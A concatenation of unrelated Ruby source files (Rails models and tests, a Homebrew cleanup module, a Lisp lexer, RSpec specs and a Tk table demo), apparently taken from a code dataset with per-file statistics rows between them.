class ShapeExpression < ActiveRecord::Base
belongs_to :shape, polymorphic: true
belongs_to :paint, polymorphic: true
end
class Circle < ActiveRecord::Base
has_many :shape_expressions, as: :shape
include Remembered
end
class Square < ActiveRecord::Base
has_many :shape_expressions, as: :shape
include Remembered
end
class Triangle < ActiveRecord::Base
has_many :shape_expressions, as: :shape
include Remembered
end
class PaintColor < ActiveRecord::Base
has_many :shape_expressions, as: :paint
belongs_to :non_poly, foreign_key: "non_poly_one_id", class_name: "NonPolyOne"
include Remembered
end
class PaintTexture < ActiveRecord::Base
has_many :shape_expressions, as: :paint
belongs_to :non_poly, foreign_key: "non_poly_two_id", class_name: "NonPolyTwo"
include Remembered
end
class NonPolyOne < ActiveRecord::Base
has_many :paint_colors
include Remembered
end
class NonPolyTwo < ActiveRecord::Base
has_many :paint_textures
include Remembered
end
class EagerLoadPolyAssocsTest < ActiveRecord::TestCase
NUM_SIMPLE_OBJS = 50
NUM_SHAPE_EXPRESSIONS = 100
def setup
generate_test_object_graphs
end
teardown do
[Circle, Square, Triangle, PaintColor, PaintTexture,
ShapeExpression, NonPolyOne, NonPolyTwo].each(&:delete_all)
end
def generate_test_object_graphs
1.upto(NUM_SIMPLE_OBJS) do
[Circle, Square, Triangle, NonPolyOne, NonPolyTwo].map(&:create!)
end
1.upto(NUM_SIMPLE_OBJS) do
PaintColor.create!(non_poly_one_id: NonPolyOne.sample.id)
PaintTexture.create!(non_poly_two_id: NonPolyTwo.sample.id)
end
1.upto(NUM_SHAPE_EXPRESSIONS) do
shape_type = [Circle, Square, Triangle].sample
paint_type = [PaintColor, PaintTexture].sample
ShapeExpression.create!(shape_type: shape_type.to_s, shape_id: shape_type.sample.id,
paint_type: paint_type.to_s, paint_id: paint_type.sample.id)
end
end
def test_include_query
res = ShapeExpression.all.merge!(includes: [ :shape, { paint: :non_poly } ]).to_a
assert_equal NUM_SHAPE_EXPRESSIONS, res.size
assert_queries(0) do
res.each do |se|
assert_not_nil se.paint.non_poly, "this is the association that was loading incorrectly before the change"
assert_not_nil se.shape, "just making sure other associations still work"
end
end
end
end
class EagerLoadNestedIncludeWithMissingDataTest < ActiveRecord::TestCase
def setup
@davey_mcdave = Author.create(name: "Davey McDave")
@first_post = @davey_mcdave.posts.create(title: "Davey Speaks", body: "Expressive wordage")
@first_comment = @first_post.comments.create(body: "Inflamatory doublespeak")
@first_categorization = @davey_mcdave.categorizations.create(category: Category.first, post: @first_post)
end
teardown do
@davey_mcdave.destroy
@first_post.destroy
@first_comment.destroy
@first_categorization.destroy
end
def test_missing_data_in_a_nested_include_should_not_cause_errors_when_constructing_objects
assert_nothing_raised do
# @davey_mcdave doesn't have any author_favorites
includes = { posts: :comments, categorizations: :category, author_favorites: :favorite_author }
Author.all.merge!(includes: includes, where: { authors: { name: @davey_mcdave.name } }, order: "categories.name").to_a
end
end
end
| 30.824 | 124 | 0.749286 |
bbbeb4b30e487915c76056dbf1285c2120a24b81 | 1,500 | # frozen_string_literal: true
module Clusters
class CreateService
attr_reader :current_user, :params
def initialize(user = nil, params = {})
@current_user, @params = user, params.dup
end
def execute(access_token: nil)
raise ArgumentError, 'Unknown clusterable provided' unless clusterable
cluster_params = params.merge(global_params).merge(clusterable_params)
cluster_params[:provider_gcp_attributes].try do |provider|
provider[:access_token] = access_token
end
cluster = Clusters::Cluster.new(cluster_params)
unless can_create_cluster?
cluster.errors.add(:base, _('Instance does not support multiple Kubernetes clusters'))
end
return cluster if cluster.errors.present?
cluster.tap do |cluster|
cluster.save && ClusterProvisionWorker.perform_async(cluster.id)
end
end
private
def clusterable
@clusterable ||= params.delete(:clusterable)
end
def global_params
{ user: current_user }
end
def clusterable_params
case clusterable
when ::Project
{ cluster_type: :project_type, projects: [clusterable] }
when ::Group
{ cluster_type: :group_type, groups: [clusterable] }
when Instance
{ cluster_type: :instance_type }
else
raise NotImplementedError
end
end
# EE would override this method
def can_create_cluster?
clusterable.clusters.empty?
end
end
end
| 24.193548 | 94 | 0.672667 |
035481643331948fd023dd31af5ec9c5c13a65ec | 1,779 | # -*- encoding: utf-8 -*-
# stub: wdm 0.1.1 ruby lib
# stub: ext/wdm/extconf.rb
Gem::Specification.new do |s|
s.name = "wdm".freeze
s.version = "0.1.1"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Maher Sallam".freeze]
s.date = "2015-07-09"
s.description = "Windows Directory Monitor (WDM) is a library which can be used to monitor directories for changes. It's mostly implemented in C and uses the Win32 API for a better performance.".freeze
s.email = ["[email protected]".freeze]
s.extensions = ["ext/wdm/extconf.rb".freeze]
s.files = ["ext/wdm/extconf.rb".freeze]
s.homepage = "https://github.com/Maher4Ever/wdm".freeze
s.required_ruby_version = Gem::Requirement.new(">= 1.9.2".freeze)
s.rubygems_version = "3.1.3".freeze
s.summary = "Windows Directory Monitor (WDM) is a threaded directories monitor for Windows.".freeze
s.installed_by_version = "3.1.3" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_development_dependency(%q<rake-compiler>.freeze, [">= 0"])
s.add_development_dependency(%q<rspec>.freeze, [">= 0"])
s.add_development_dependency(%q<guard-rspec>.freeze, [">= 0"])
s.add_development_dependency(%q<guard-shell>.freeze, [">= 0"])
s.add_development_dependency(%q<pry>.freeze, [">= 0"])
else
s.add_dependency(%q<rake-compiler>.freeze, [">= 0"])
s.add_dependency(%q<rspec>.freeze, [">= 0"])
s.add_dependency(%q<guard-rspec>.freeze, [">= 0"])
s.add_dependency(%q<guard-shell>.freeze, [">= 0"])
s.add_dependency(%q<pry>.freeze, [">= 0"])
end
end
| 42.357143 | 203 | 0.687465 |
08a010203621e8616c444aa79c186a679efde775 | 393 | class User < ActiveRecord::Base
include Authenticable
has_many :presentations, :dependent => :destroy
has_one :billing_information
attr_accessor :old_password
def deliver_password_reset_instructions!
reset_perishable_token!
PasswordMailer.deliver_instructions(self)
end
def full_name
[first_name, last_name].join(" ")
end
def owner
self
end
end
| 17.086957 | 49 | 0.737913 |
5db65f289ccaf4c40d659c10f727289b7431190e | 2,121 | module RailsAdmin
module Config
module Actions
class New < RailsAdmin::Config::Actions::Base
RailsAdmin::Config::Actions.register(self)
register_instance_option :collection do
true
end
register_instance_option :http_methods do
[:get, :post] # NEW / CREATE
end
register_instance_option :controller do
proc do
if request.get? # NEW
@object = @abstract_model.new
@authorization_adapter && @authorization_adapter.attributes_for(:new, @abstract_model).each do |name, value|
@object.send("#{name}=", value)
end
if object_params = params[@abstract_model.param_key]
sanitize_params_for!(request.xhr? ? :modal : :create)
@object.set_attributes(@object.attributes.merge(object_params.to_h))
end
respond_to do |format|
format.html { render @action.template_name }
format.js { render @action.template_name, layout: false }
end
elsif request.post? # CREATE
@modified_assoc = []
@object = @abstract_model.new
sanitize_params_for!(request.xhr? ? :modal : :create)
@object.set_attributes(params[@abstract_model.param_key])
action_authorized = !@authorization_adapter || @authorization_adapter.authorize(:create, @abstract_model, @object)
if action_authorized && @object.save
@auditing_adapter && @auditing_adapter.create_object(@object, @abstract_model, _current_user)
respond_to do |format|
format.html { redirect_to_on_success }
format.js { render json: {id: @object.id.to_s, label: @model_config.with(object: @object).object_label} }
end
else
handle_save_error
end
end
end
end
register_instance_option :link_icon do
'icon-plus'
end
end
end
end
end
| 34.209677 | 128 | 0.573314 |
79cb75336a55555fddafa4fc6bd59d8f16d86c80 | 3,816 | require 'singleton'
module Klam
class Lexer
SYMBOL_CHARS = /[-=*\/+_?$!\@~><&%'#`;:{}a-zA-Z0-9.,]/
# Syntax tokens
class OpenParen
include Singleton
end
class CloseParen
include Singleton
end
def initialize(stream)
@stream = stream
@buffer = []
end
def eof?
@buffer.empty? && @stream.eof?
end
def getc
if @buffer.empty?
@stream.getc
else
@buffer.pop
end
end
def ungetc(c)
@buffer.push(c)
end
def next
drain_whitespace
unless eof?
c = getc
case c
when '('
OpenParen.instance
when ')'
CloseParen.instance
when '"'
consume_string
when SYMBOL_CHARS
ungetc(c)
consume_number_or_symbol
else
raise Klam::SyntaxError, "illegal character: #{c}"
end
end
end
private
def drain_whitespace
until eof?
c = getc
if c =~ /\S/
ungetc(c)
break
end
end
end
def consume_string
chars = []
loop do
raise Klam::SyntaxError, "unterminated string" if eof?
c = getc
break if c == '"'
chars << c
end
chars.join
end
def consume_number
# Shen allows multiple leading plusses and minuses. The plusses
# are ignored and an even number of minuses cancel each other.
# Thus '------+-7' is read as 7.
#
# The Shen reader parses "7." as the integer 7 and the symbol '.'
decimal_seen = false
negative = false
past_sign = false
chars = []
loop do
break if eof?
c = getc
if c =~ /\d/
past_sign = true
chars << c
elsif c == '.' && !decimal_seen
past_sign = true
decimal_seen = true
chars << c
elsif c == '+' && !past_sign
# ignore
elsif c == '-' && !past_sign
negative = !negative
else
ungetc c
break
end
end
chars.unshift('-') if negative
if chars.last == '.'
# A trailing decimal point is treated as part of the next
# token. Forget we saw it.
ungetc(chars.pop)
decimal_seen = false
end
str = chars.join
decimal_seen ? str.to_f : str.to_i
end
def consume_symbol
chars = []
loop do
break if eof?
c = getc
unless c =~ SYMBOL_CHARS
ungetc c
break
end
chars << c
end
str = chars.join
case str
when 'true'
true
when 'false'
false
else
str.to_sym
end
end
def consume_number_or_symbol
# First drain optional leading signs
# Then drain optional decimal point
# If there is another character and it is a digit, then it
# is a number. Otherwise it is a symbol.
chars = []
loop do
break if eof?
c = getc
unless c =~ /[-+]/
ungetc c
break
end
chars << c
end
if eof?
chars.reverse.each {|x| ungetc x}
return consume_symbol
end
c = getc
chars << c
if c == '.'
if eof?
chars.reverse.each {|x| ungetc x}
return consume_symbol
end
c = getc
chars << c
chars.reverse.each {|x| ungetc x}
if c =~ /\d/
return consume_number
else
return consume_symbol
end
elsif c =~ /\d/
chars.reverse.each {|x| ungetc x}
return consume_number
else
chars.reverse.each {|x| ungetc x}
return consume_symbol
end
end
end
end
| 20.516129 | 71 | 0.496331 |
393ad0c650b4b970d52aa4eb8b8aac2025633a98 | 6,031 | require 'spec_helper'
RSpec.describe SigepWeb do
subject(:sigep_web) { described_class }
before do
SigepWeb.configure do |config|
config.user = 'sigep'
config.password = 'n5f9t8'
config.administrative_code = '08082650'
config.contract = '9912208555'
config.card = '0057018901'
end
end
describe '.configuration' do
it 'should have the correct user' do
expect(SigepWeb.configuration.user).to eq 'sigep'
end
it 'should have the correct password' do
expect(SigepWeb.configuration.password).to eq 'n5f9t8'
end
it 'should have the correct administrative_code' do
expect(SigepWeb.configuration.administrative_code).to eq '08082650'
end
it 'should have the correct contract' do
expect(SigepWeb.configuration.contract).to eq '9912208555'
end
it 'should have the correct card' do
expect(SigepWeb.configuration.card).to eq '0057018901'
end
end
describe '.service_availability' do
let(:service_availability) { instance_double(SigepWeb::ServiceAvailability) }
before do
allow(SigepWeb::ServiceAvailability).to receive(:new).and_return(service_availability)
allow(service_availability).to receive(:request)
sigep_web.service_availability(
service_number: '0', source_zip: '0', target_zip: '0'
)
end
it 'is expected to access SigepWeb::ServiceAvailability#request' do
expect(service_availability).to have_received(:request)
end
end
describe '.search_client' do
let(:search_client) { instance_double(SigepWeb::SearchClient) }
before do
allow(SigepWeb::SearchClient).to receive(:new).and_return(search_client)
allow(search_client).to receive(:request)
sigep_web.search_client(
id_contract: '9992157880', id_post_card: '0067599079'
)
end
    it 'is expected to access SigepWeb::SearchClient#request' do
expect(search_client).to have_received(:request)
end
end
describe '.zip_query' do
let(:zip_query) { instance_double(SigepWeb::ZipQuery) }
before do
allow(SigepWeb::ZipQuery).to receive(:new).and_return(zip_query)
allow(zip_query).to receive(:request)
sigep_web.zip_query(zip: '70002900')
end
    it 'is expected to access SigepWeb::ZipQuery' do
expect(zip_query).to have_received(:request)
end
end
describe '.request_labels' do
let(:request_labels) { instance_double(SigepWeb::RequestLabels) }
before do
allow(SigepWeb::RequestLabels).to receive(:new).and_return(request_labels)
allow(request_labels).to receive(:request)
sigep_web.request_labels(
receiver_type: 'C', identifier: '000000000000',
id_service: '104707', qt_labels: '1'
)
end
    it 'is expected to access SigepWeb::RequestLabels' do
expect(request_labels).to have_received(:request)
end
end
describe '.generate_labels_digit_verifier' do
let(:generate_labels_digit_verifier) { instance_double(SigepWeb::GenerateLabelsDigitVerifier) }
before do
allow(SigepWeb::GenerateLabelsDigitVerifier)
.to receive(:new).and_return(generate_labels_digit_verifier)
allow(generate_labels_digit_verifier).to receive(:request)
sigep_web.generate_labels_digit_verifier(labels: ['DL76023727 BR'])
end
    it 'is expected to access SigepWeb::GenerateLabelsDigitVerifier' do
expect(generate_labels_digit_verifier).to have_received(:request)
end
end
describe '.request_ptp_services' do
let(:request_ptp_services) { instance_double(SigepWeb::RequestPlpServices) }
before do
allow(SigepWeb::RequestPlpServices)
.to receive(:new).and_return(request_ptp_services)
allow(request_ptp_services).to receive(:request)
sigep_web.request_plp_services(
labels: ['SX08689124BR'], id_plp_client: 123, plp: {}
)
end
    it 'is expected to access SigepWeb::RequestPlpServices' do
expect(request_ptp_services).to have_received(:request)
end
end
describe '.postage_card_status' do
let(:postage_card_status) { instance_double(SigepWeb::PostageCardStatus) }
before do
allow(SigepWeb::PostageCardStatus)
.to receive(:new).and_return(postage_card_status)
allow(postage_card_status).to receive(:request)
sigep_web.postage_card_status(postage_number_card: '000')
end
    it 'is expected to access SigepWeb::PostageCardStatus' do
expect(postage_card_status).to have_received(:request)
end
end
describe '.request_xml_plp' do
let(:request_xml_plp) { instance_double(SigepWeb::RequestXmlPlp) }
before do
allow(SigepWeb::RequestXmlPlp)
.to receive(:new).and_return(request_xml_plp)
allow(request_xml_plp).to receive(:request)
sigep_web.request_xml_plp(id_plp: '000')
end
    it 'is expected to access SigepWeb::RequestXmlPlp' do
expect(request_xml_plp).to have_received(:request)
end
end
describe '.request_range' do
let(:request_range) { instance_double(SigepWeb::RequestRange) }
before do
allow(SigepWeb::RequestRange)
.to receive(:new).and_return(request_range)
allow(request_range).to receive(:request)
sigep_web.request_range(type: 'AP', service: '', quantity: 1)
end
    it 'is expected to access SigepWeb::RequestRange' do
expect(request_range).to have_received(:request)
end
end
describe '.calculate_digit_checker' do
let(:calculate_digit_checker) { instance_double(SigepWeb::CalculateDigitChecker) }
before do
allow(SigepWeb::CalculateDigitChecker)
.to receive(:new).and_return(calculate_digit_checker)
allow(calculate_digit_checker).to receive(:request)
sigep_web.calculate_digit_checker(number: '666')
end
    it 'is expected to access SigepWeb::CalculateDigitChecker' do
expect(calculate_digit_checker).to have_received(:request)
end
end
end
| 29.70936 | 99 | 0.705521 |
e8c71019a8c30aaa879a44d5dd62331a539880b7 | 1,464 | #Key-value store for field-specific configurations
class FieldConfig < ActiveRecord::Base
include ActiveModel::ForbiddenAttributesProtection
include PublicActivity::Common if defined? PublicActivity::Common
belongs_to :field
belongs_to :screen
validates_presence_of :key, :field_id
validates_uniqueness_of :key, :scope => [:screen_id, :field_id]
scope :default, where(:screen_id => nil)
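  # Return the stored value for the given screen/field/key combination, or nil when no config exists.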
def self.get(screen, field, key)
field_config = FieldConfig.where(:screen_id => screen.id, :field_id => field.id, :key => key).first
if !field_config.nil?
return field_config.value
else
return nil
end
end
# Identify the type of key, if it is being used from the global
# field_config application config hash.
#
# @return [Symbol, nil] The type of key or nil if not found.
def key_type
return nil if key.nil?
sym_key = key.to_sym
if Concerto::Application.config.field_configs.include?(sym_key)
return Concerto::Application.config.field_configs[sym_key][:type]
end
return nil
end
# Grab any options that they key has from the global field_config hash.
#
# @return [Array, nil] Returns the options or nil if there are none.
# For :select keys, this will return an array of the possible values.
def key_options
case key_type
when :select
return Concerto::Application.config.field_configs[key.to_sym][:values]
else
return nil
end
end
end
| 29.877551 | 103 | 0.710383 |
87b7181713f70e63ce45b8b57e535de4eb0a17a8 | 597 | require_relative 'boot'
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module SampleApp
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 5.1
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
end
end
| 29.85 | 82 | 0.765494 |
9186f1ac3587ea81aa7546174cdc0befa4f9e8b8 | 1,275 | require 'spec_helper'
describe 'scaleio::package' do
let (:title) { 'gateway' }
let :default_params do
{
      :pkg_ftp => 'pkg_ftp'
    }
end
let (:facts) {{ :osfamily => 'Debian' }}
let (:params) { default_params }
it { is_expected.to contain_scaleio__package(title)}
context 'ensure is absent' do
let :params do
default_params.merge(:ensure => 'absent')
end
it 'not contain packages' do
is_expected.not_to contain_scaleio__package('emc-scaleio-gateway')
end
end
context 'ensure is present' do
let :params do
default_params.merge(:ensure => 'present')
end
it { is_expected.to contain_file('ensure get_package.sh for gateway').with(
:ensure => 'present',
:path => '/root/get_package_gateway.sh',
:source => 'puppet:///modules/scaleio/get_package.sh',
:mode => '0700',
:owner => 'root',
:group => 'root')}
it { is_expected.to contain_exec('get_package gateway').with(
:command => '/root/get_package_gateway.sh pkg_ftp/Ubuntu gateway',
:path => '/bin:/usr/bin')}
it { is_expected.to contain_package('emc-scaleio-gateway').with(
:ensure => 'present',
:source => '/tmp/gateway/gateway.deb',
:provider => 'dpkg')}
end
end
| 28.333333 | 79 | 0.623529 |
7a8bd346bc88ffcc765e95ffb8d73d0f2f67730a | 310 | class Cody::Stack
class Create < Base
def perform
cfn.create_stack(
stack_name: @stack_name,
template_body: YAML.dump(@template),
capabilities: ["CAPABILITY_IAM"]
)
puts "Creating stack #{@stack_name}. Check CloudFormation console for status."
end
end
end
| 23.846154 | 84 | 0.645161 |
2679b4b76abe8f8cf474f1f5bcb33899bc1fce3c | 12,591 | # frozen_string_literal: true
require "utils/bottles"
require "utils/gems"
require "formula"
require "cask/cask_loader"
require "set"
CLEANUP_DEFAULT_DAYS = 30
CLEANUP_MAX_AGE_DAYS = 120
module CleanupRefinement
refine Pathname do
def incomplete?
extname.end_with?(".incomplete")
end
def nested_cache?
directory? && %w[cargo_cache go_cache glide_home java_cache npm_cache gclient_cache].include?(basename.to_s)
end
def go_cache_directory?
# Go makes its cache contents read-only to ensure cache integrity,
# which makes sense but is something we need to undo for cleanup.
directory? && %w[go_cache].include?(basename.to_s)
end
def prune?(days)
return false unless days
return true if days.zero?
return true if symlink? && !exist?
mtime < days.days.ago && ctime < days.days.ago
end
def stale?(scrub = false)
return false unless resolved_path.file?
if dirname.basename.to_s == "Cask"
stale_cask?(scrub)
else
stale_formula?(scrub)
end
end
private
def stale_formula?(scrub)
return false unless HOMEBREW_CELLAR.directory?
version = if to_s.match?(Pathname::BOTTLE_EXTNAME_RX)
begin
Utils::Bottles.resolve_version(self)
rescue
nil
end
end
version ||= basename.to_s[/\A.*(?:\-\-.*?)*\-\-(.*?)#{Regexp.escape(extname)}\Z/, 1]
version ||= basename.to_s[/\A.*\-\-?(.*?)#{Regexp.escape(extname)}\Z/, 1]
return false unless version
version = Version.new(version)
return false unless formula_name = basename.to_s[/\A(.*?)(?:\-\-.*?)*\-\-?(?:#{Regexp.escape(version)})/, 1]
formula = begin
Formulary.from_rack(HOMEBREW_CELLAR/formula_name)
rescue FormulaUnavailableError, TapFormulaAmbiguityError, TapFormulaWithOldnameAmbiguityError
return false
end
resource_name = basename.to_s[/\A.*?\-\-(.*?)\-\-?(?:#{Regexp.escape(version)})/, 1]
if resource_name == "patch"
patch_hashes = formula.stable&.patches&.select(&:external?)&.map(&:resource)&.map(&:version)
return true unless patch_hashes&.include?(Checksum.new(:sha256, version.to_s))
elsif resource_name && resource_version = formula.stable&.resources&.dig(resource_name)&.version
return true if resource_version != version
elsif version.is_a?(PkgVersion)
return true if formula.pkg_version > version
elsif formula.version > version
return true
end
return true if scrub && !formula.installed?
return true if Utils::Bottles.file_outdated?(formula, self)
false
end
def stale_cask?(scrub)
return false unless name = basename.to_s[/\A(.*?)\-\-/, 1]
cask = begin
Cask::CaskLoader.load(name)
rescue Cask::CaskUnavailableError
return false
end
return true unless basename.to_s.match?(/\A#{Regexp.escape(name)}\-\-#{Regexp.escape(cask.version)}\b/)
return true if scrub && !cask.versions.include?(cask.version)
if cask.version.latest?
return mtime < CLEANUP_DEFAULT_DAYS.days.ago &&
ctime < CLEANUP_DEFAULT_DAYS.days.ago
end
false
end
end
end
using CleanupRefinement
module Homebrew
class Cleanup
extend Predicable
PERIODIC_CLEAN_FILE = (HOMEBREW_CACHE/".cleaned").freeze
attr_predicate :dry_run?, :scrub?
attr_reader :args, :days, :cache
attr_reader :disk_cleanup_size
def initialize(*args, dry_run: false, scrub: false, days: nil, cache: HOMEBREW_CACHE)
@disk_cleanup_size = 0
@args = args
@dry_run = dry_run
@scrub = scrub
@days = days || CLEANUP_MAX_AGE_DAYS
@cache = cache
@cleaned_up_paths = Set.new
end
def self.install_formula_clean!(f)
return if ENV["HOMEBREW_NO_INSTALL_CLEANUP"]
cleanup = Cleanup.new
if cleanup.periodic_clean_due?
cleanup.periodic_clean!
elsif f.installed?
cleanup.cleanup_formula(f)
end
end
def periodic_clean_due?
return false if ENV["HOMEBREW_NO_INSTALL_CLEANUP"]
return true unless PERIODIC_CLEAN_FILE.exist?
PERIODIC_CLEAN_FILE.mtime < CLEANUP_DEFAULT_DAYS.days.ago
end
def periodic_clean!
return false unless periodic_clean_due?
ohai "`brew cleanup` has not been run in #{CLEANUP_DEFAULT_DAYS} days, running now..."
clean!(quiet: true, periodic: true)
end
def clean!(quiet: false, periodic: false)
if args.empty?
Formula.installed.sort_by(&:name).each do |formula|
cleanup_formula(formula, quiet: quiet)
end
cleanup_cache
cleanup_logs
cleanup_lockfiles
prune_prefix_symlinks_and_directories
unless dry_run?
cleanup_old_cache_db
rm_ds_store
HOMEBREW_CACHE.mkpath
FileUtils.touch PERIODIC_CLEAN_FILE
end
# Cleaning up Ruby needs to be done last to avoid requiring additional
# files afterwards. Additionally, don't allow it on periodic cleans to
# avoid having to try to do a `brew install` when we've just deleted
# the running Ruby process...
return if periodic
cleanup_portable_ruby
else
args.each do |arg|
formula = begin
Formulary.resolve(arg)
rescue FormulaUnavailableError, TapFormulaAmbiguityError, TapFormulaWithOldnameAmbiguityError
nil
end
cask = begin
Cask::CaskLoader.load(arg)
rescue Cask::CaskUnavailableError
nil
end
cleanup_formula(formula) if formula
cleanup_cask(cask) if cask
end
end
end
def unremovable_kegs
@unremovable_kegs ||= []
end
def cleanup_formula(formula, quiet: false)
formula.eligible_kegs_for_cleanup(quiet: quiet)
.each(&method(:cleanup_keg))
cleanup_cache(Pathname.glob(cache/"#{formula.name}--*"))
rm_ds_store([formula.rack])
cleanup_lockfiles(FormulaLock.new(formula.name).path)
end
def cleanup_cask(cask)
cleanup_cache(Pathname.glob(cache/"Cask/#{cask.token}--*"))
rm_ds_store([cask.caskroom_path])
cleanup_lockfiles(CaskLock.new(cask.token).path)
end
def cleanup_keg(keg)
cleanup_path(keg) { keg.uninstall }
rescue Errno::EACCES => e
opoo e.message
unremovable_kegs << keg
end
def cleanup_logs
return unless HOMEBREW_LOGS.directory?
logs_days = if days > CLEANUP_DEFAULT_DAYS
CLEANUP_DEFAULT_DAYS
else
days
end
HOMEBREW_LOGS.subdirs.each do |dir|
cleanup_path(dir) { dir.rmtree } if dir.prune?(logs_days)
end
end
def cleanup_unreferenced_downloads
return if dry_run?
return unless (cache/"downloads").directory?
downloads = (cache/"downloads").children
referenced_downloads = [cache, cache/"Cask"].select(&:directory?)
.flat_map(&:children)
.select(&:symlink?)
.map(&:resolved_path)
(downloads - referenced_downloads).each do |download|
if download.incomplete?
begin
LockFile.new(download.basename).with_lock do
download.unlink
end
rescue OperationInProgressError
# Skip incomplete downloads which are still in progress.
next
end
elsif download.directory?
FileUtils.rm_rf download
else
download.unlink
end
end
end
def cleanup_cache(entries = nil)
entries ||= [cache, cache/"Cask"].select(&:directory?).flat_map(&:children)
entries.each do |path|
next if path == PERIODIC_CLEAN_FILE
FileUtils.chmod_R 0755, path if path.go_cache_directory? && !dry_run?
next cleanup_path(path) { path.unlink } if path.incomplete?
next cleanup_path(path) { FileUtils.rm_rf path } if path.nested_cache?
if path.prune?(days)
if path.file? || path.symlink?
cleanup_path(path) { path.unlink }
elsif path.directory? && path.to_s.include?("--")
cleanup_path(path) { FileUtils.rm_rf path }
end
next
end
next cleanup_path(path) { path.unlink } if path.stale?(scrub?)
end
cleanup_unreferenced_downloads
end
def cleanup_path(path)
return unless @cleaned_up_paths.add?(path)
disk_usage = path.disk_usage
if dry_run?
puts "Would remove: #{path} (#{path.abv})"
@disk_cleanup_size += disk_usage
else
puts "Removing: #{path}... (#{path.abv})"
yield
@disk_cleanup_size += disk_usage - path.disk_usage
end
end
def cleanup_lockfiles(*lockfiles)
return if dry_run?
lockfiles = HOMEBREW_LOCKS.children.select(&:file?) if lockfiles.empty? && HOMEBREW_LOCKS.directory?
lockfiles.each do |file|
next unless file.readable?
next unless file.open(File::RDWR).flock(File::LOCK_EX | File::LOCK_NB)
begin
file.unlink
ensure
file.open(File::RDWR).flock(File::LOCK_UN) if file.exist?
end
end
end
def cleanup_portable_ruby
system_ruby_version =
Utils.popen_read("/usr/bin/ruby", "-e", "puts RUBY_VERSION")
.chomp
use_system_ruby = (
Gem::Version.new(system_ruby_version) >= Gem::Version.new(RUBY_VERSION)
) && ENV["HOMEBREW_FORCE_VENDOR_RUBY"].nil?
vendor_path = HOMEBREW_LIBRARY/"Homebrew/vendor"
portable_ruby_version_file = vendor_path/"portable-ruby-version"
portable_ruby_version = if portable_ruby_version_file.exist?
portable_ruby_version_file.read
.chomp
end
portable_ruby_path = vendor_path/"portable-ruby"
portable_ruby_glob = "#{portable_ruby_path}/*.*"
Pathname.glob(portable_ruby_glob).each do |path|
next if !use_system_ruby && portable_ruby_version == path.basename.to_s
if dry_run?
puts "Would remove: #{path} (#{path.abv})"
else
FileUtils.rm_rf path
end
end
return unless Dir.glob(portable_ruby_glob).empty?
return unless portable_ruby_path.exist?
bundler_path = vendor_path/"bundle/ruby"
if dry_run?
puts "Would remove: #{bundler_path} (#{bundler_path.abv})"
puts "Would remove: #{portable_ruby_path} (#{portable_ruby_path.abv})"
else
FileUtils.rm_rf [bundler_path, portable_ruby_path]
end
end
def cleanup_old_cache_db
FileUtils.rm_rf [
cache/"desc_cache.json",
cache/"linkage.db",
cache/"linkage.db.db",
]
end
def rm_ds_store(dirs = nil)
dirs ||= begin
Keg::MUST_EXIST_DIRECTORIES + [
HOMEBREW_PREFIX/"Caskroom",
]
end
dirs.select(&:directory?).each do |dir|
system_command "find",
args: [dir, "-name", ".DS_Store", "-delete"],
print_stderr: false
end
end
def prune_prefix_symlinks_and_directories
ObserverPathnameExtension.reset_counts!
dirs = []
Keg::MUST_EXIST_SUBDIRECTORIES.each do |dir|
next unless dir.directory?
dir.find do |path|
path.extend(ObserverPathnameExtension)
if path.symlink?
unless path.resolved_path_exists?
if path.to_s =~ Keg::INFOFILE_RX
path.uninstall_info unless dry_run?
end
if dry_run?
puts "Would remove (broken link): #{path}"
else
path.unlink
end
end
elsif path.directory? && !Keg::MUST_EXIST_SUBDIRECTORIES.include?(path)
dirs << path
end
end
end
dirs.reverse_each do |d|
if dry_run? && d.children.empty?
puts "Would remove (empty directory): #{d}"
else
d.rmdir_if_possible
end
end
return if dry_run?
return if ObserverPathnameExtension.total.zero?
n, d = ObserverPathnameExtension.counts
print "Pruned #{n} symbolic links "
print "and #{d} directories " if d.positive?
puts "from #{HOMEBREW_PREFIX}"
end
end
end
| 28.615909 | 114 | 0.616313 |
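A minimal dry-run sketch of the Homebrew::Cleanup class above, assuming a process that has already loaded Homebrew's libraries (HOMEBREW_CACHE and related constants come from that environment); with dry_run set, candidate paths are only reported, never deleted.

cleanup = Homebrew::Cleanup.new(dry_run: true, days: 30)
cleanup.clean!(quiet: true)   # prints "Would remove: ..." for each candidate path
puts "Would reclaim #{cleanup.disk_cleanup_size} bytes in total"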
d5cd5e49ba137752290a423100a2b80921652368 | 3,297 | #!/usr/bin/env ruby
##
## debug.rb
##
## This demo uses most features of the table widget
##
## ( based on 'debug.tcl' included in the source archive of the tktable extension )
##
require 'tk'
require 'tkextlib/tktable'
# create the table
ary = TkVariable.new_hash
rows = 25
cols = 20
# fill table variable
((-(rows))..rows).each{|x|
((-(cols))..cols).each{|y|
ary[x,y] = "r#{x},c#{y}"
}
}
lbl = TkLabel.new(:text=>"TkTable v2 Example")
table = Tk::TkTable.new(:rows=>rows, :cols=>cols, :variable=>ary,
:width=>6, :height=>6,
:titlerows=>1, :titlecols=>2,
:roworigin=>-5, :colorigin=>-2,
:coltagcommand=>proc{|col|
col = Integer(col)
(col>0 && col%2 == 1)? 'OddCol': ''
},
:selectmode=>:extended, :flashmode=>true,
:rowstretch=>:unset, :colstretch=>:unset,
:selecttitles=>false, :drawmode=>:single)
sx = table.xscrollbar(TkScrollbar.new)
sy = table.yscrollbar(TkScrollbar.new)
btn = TkButton.new(:text=>'Exit', :command=>proc{exit})
Tk.grid(lbl, '-', :sticky=>:ew)
Tk.grid(table, sy, :sticky=>:news)
Tk.grid(sx, :sticky=>:ew)
Tk.grid(btn, :sticky=>:ew, :columnspan=>2)
Tk.root.grid_columnconfig(0, :weight=>1)
Tk.root.grid_rowconfig(1, :weight=>1)
table.tag_configure('OddCol', :bg=>'brown', :fg=>'pink')
table.tag_configure('title', :bg=>'red', :fg=>'green', :relief=>:sunken)
table.tag_configure('dis', :state=>:disabled)
first = table[:colorigin]
%w(n s e w nw ne sw se c).each_with_index{|anchor, idx|
table.tag_configure(anchor, :anchor=>anchor)
table.tag_row(anchor, idx)
